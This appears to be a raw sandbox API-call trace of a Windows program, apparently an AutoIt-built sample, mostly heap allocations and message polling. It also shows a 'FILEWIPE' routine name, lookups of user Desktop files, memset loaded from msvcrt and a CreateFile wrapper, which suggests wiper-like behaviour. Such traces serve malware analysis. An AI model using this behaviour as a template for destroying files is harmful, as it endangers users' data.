[0167.776] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.780] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.781] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.781] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0167.781] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x33873000, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 0x90ae18 [0167.782] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.783] CharLowerBuffW (in: lpsz="byte[16668]", cchLength=0xb | out: lpsz="byte[16668]") returned 0xb [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0167.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.784] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.784] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.785] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.786] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0167.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0167.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0167.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.786] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.788] FreeLibrary (hLibModule=0x75c90000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0167.790] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.790] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0167.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0167.791] 